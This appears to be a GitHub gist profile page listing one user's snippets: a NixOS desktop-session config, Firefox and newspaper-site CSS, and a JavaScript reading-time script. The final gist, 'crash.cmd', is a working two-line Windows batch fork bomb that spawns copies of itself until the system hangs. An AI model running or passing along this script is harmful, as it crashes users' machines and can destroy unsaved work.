Skip to content

Instantly share code, notes, and snippets.

View bluelinden's full-sized avatar
🦀
Focusing Focusing Focusing Focusing Focusing Focusing Focusing Focusing Focusing

blue linden bluelinden

🦀
Focusing Focusing Focusing Focusing Focusing Focusing Focusing Focusing Focusing
View GitHub Profile
{ pkgs, specialArgs, ... }:
{
services.displayManager.sessionPackages = [
((pkgs.writeTextFile {
name = "cosmic-on-niri";
destination = "/share/wayland-sessions/COSMIC-on-niri.desktop";
text = ''
[Desktop Entry]
Name=COSMIC-on-niri
Comment=This session logs you into the COSMIC desktop on niri
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@bluelinden
bluelinden / userChrome.css
Created August 18, 2023 01:20
Arc Theme for Firefox
@import url(theming/color-alt.css);
@import url(sidebar.css);
/* MY CUSTOMS */
#TabsToolbar {display: none;}
#titlebar {margin-top: -30px !important;}
@bluelinden
bluelinden / sno-oldstyle-cool-fade.css
Created June 28, 2023 14:52
SNOSites old style cool fade
/* new story page design */
@media only screen and (min-width: 1100px) {
.catboxphoto {
margin-bottom: 0 !important;
}
.postarea:has(.storyshadow) span.storycontent {
top: -100px !important;
position: relative;
width: revert;
}
// copyright 2023 Blue Linden - CC-BY-NC-SA
// for use on SNOsites newspaper websites; it ain't guaranteed to work anywhere else.
(function showReadingTime() {
let storyMeta = document.querySelector('#storymeta p');
let readingTimeIndicator = document.createElement('span');
readingTimeIndicator.setAttribute('id','readingTimeIndicator');
storyMeta.appendChild(readingTimeIndicator);
let divider = document.createElement('span');
divider.setAttribute('class','byline-divider');
divider.innerText = '|'
@bluelinden
bluelinden / crash.cmd
Created May 26, 2022 12:32
best fork bomb ever
:a
start /min cmd /k %~f0 & goto a